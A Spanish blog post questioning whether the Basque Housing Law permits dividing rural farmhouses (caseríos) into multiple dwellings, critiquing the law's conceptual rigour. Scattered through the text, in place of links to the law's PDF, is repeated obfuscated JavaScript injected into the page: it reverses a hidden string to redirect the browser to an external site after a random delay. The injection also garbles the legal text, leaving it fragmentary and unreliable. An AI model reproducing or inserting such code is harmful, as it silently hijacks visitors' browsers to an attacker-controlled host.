[Pasatiempos] Ley de Vivienda y Caseríos

Es posible que nuestra flamante

Caserío Mañastegizar

La $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/2015/06/1502853a.pdf#page=31″>LvV 40.b)por la renovación del patrimonio edificado para garantizar su conservación. Por ejemplo, los $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/2015/06/1502853a.pdf#page=34″>43.5, $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/2015/06/1502853a.pdf#page=66″ target=”_blank”>DF6 (las tres sobre exención de obligaciones urbanísticas), $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/2015/06/1502853a.pdf#page=38″>51.6 (¿Es un cheque en blanco? ¿Qué alcance tiene podrán?)….

Otra de las medidas adoptadas es la contemplada en el toriza la división de viviendas.

Así, directamente desde la Ley sectorial, sin pararse en matices urbanísticos, de planeamiento…

Puede que os estéis preguntando si será posible, pero no es infrecuente que una mente muy centrada en su pensamiento único no calcule los efectos de sus ocurrencias (la advertencia castellana sobre evitar que sea peor el remedio que la enfermedad). Por ello, las normas tienen procesos de elaboración en que hay contraste pero, en este caso, se han eludido todos los mecanismos de contraste.

Por tanto….

¿Desde la ”¿Desde

) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/2015/06/1502853a.pdf” target=”_blank”>Ley de Vivienda, es posible hacer en un caserío dos o más viviendas independientes?  Pulsa aquí para ver la respuesta“]

Obviamente, no tenemos la solución.

Conceptualmente, la vivienda del agricultor no es uso residencial sino un uso auxiliar de la explotación de carácter primario y, en consecuencia, no debería estar afectado por esta normativa, como tampoco ha de estarlo la vivienda del guarda de una industria o la vivienda del farero.

Sin embargo, tanto esta de Suelo y Urbanismo se caracterizan por su falta de reflexión conceptual. Esta falta de rigor conceptual ha llevado al carajal, digo, a la regulación de la “vivienda” en suelo no urbanizable: Reconstrucción de caseríos, construcción de caseríos nuevos, viviendas autónomas en Núcleos Rurales…

La LvSU autoriza expresamente la división de caseríos pero solamente en Núcleos Rurales, la supuesta prohibición en el resto del suelo No Urbanizable, es un resultado casual? Es deseada la desactualización de caseríos que provoca? Y el efecto inducido de pérdida del Patrimonio Cultural?

¿Cómo define la vivienda la

  • Vivienda: Edificio o parte de un edificio, de carácter privativo y con destino a uso residencial ($NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/2015/06/1502853a.pdf#page=11″>LvV 3.z).
  • ¿Los caseríos son vivienda?, ¿La posibilidad de dividir viviendas afecta a los caseríos? ¿El planeamiento podría prohibir la división autorizada por la ley?

    Todo son preguntas…

    Todos los PASATIEMPOS

     

    The following two tabs change content below.
    Ingeniero Agrónomo (1986). Técnico en Valoraciones y Expropiaciones (1989-2014). Desde 2003, Socio y Gerente de Lurtek, empresa dedicada a la Gestión del Suelo, Valoraciones y Asistencia Técnica a diversas Administraciones en procedimientos Expropiatorios. Técnico en valoraciones inmobiliarias (colaborador de Servatas, Artasa, Tasasur). Profesor en cursos de Valoración del IVAP.

    Leave a Reply

    Your email address will not be published.